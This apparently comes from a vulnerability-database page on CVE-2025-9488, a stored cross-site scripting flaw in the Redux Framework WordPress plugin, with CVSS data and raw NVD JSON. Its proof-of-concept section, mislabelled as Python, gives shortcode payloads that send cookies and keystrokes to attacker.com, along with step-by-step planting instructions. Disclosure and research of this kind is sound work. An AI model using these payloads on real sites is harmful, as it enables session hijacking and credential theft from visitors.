Security Vulnerability Report
中文
CVE-2025-9488 CVSS 6.4 MEDIUM

CVE-2025-9488

Published: 2025-12-13 16:16:57
Last Modified: 2026-04-15 00:35:42

Description

The Redux Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘data’ parameter in all versions up to, and including, 4.5.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Redux Framework插件 < 4.5.9
Redux Framework插件 ≤ 4.5.8(所有早期版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- WordPress Redux Framework XSS PoC - CVE-2025-9488 --> <!-- Requires Contributor-level access --> <!-- Method 1: Via WordPress Shortcode --> [redux data='<script>console.log("XSS Triggered - CVE-2025-9488")</script>'] <!-- Method 2: Cookie Theft Payload --> [redux data='<img src=x onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)">'] <!-- Method 3: Session Hijacking Payload --> [redux data='<script>fetch("https://attacker.com/log?data="+btoa(document.cookie))</script>'] <!-- Method 4: Keylogger Payload --> [redux data='<script>document.addEventListener("keypress",function(e){fetch("https://attacker.com/k?"+e.key)})</script>'] <!-- HTML Context --> <div class="redux-data-container" data-value='<script>alert("XSS")</script>'></div> <!-- Exploitation Note: 1. Create new post/page as Contributor user 2. Insert any of the above payloads in content 3. Publish or schedule the post 4. Any user viewing the page will execute the injected script -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9488", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:57.153", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Redux Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘data’ parameter in all versions up to, and including, 4.5.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/redux-framework/tags/4.5.7/redux-core/inc/extensions/shortcodes/class-redux-shortcodes.php#L205", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3402803%40redux-framework&new=3402803%40redux-framework&sfp_email=&sfph_mail=#file22", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/redux-framework/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cabf776d-8749-45a8-94c1-7d1eef93a183?source=cve", "source": "[email protected]"}]}}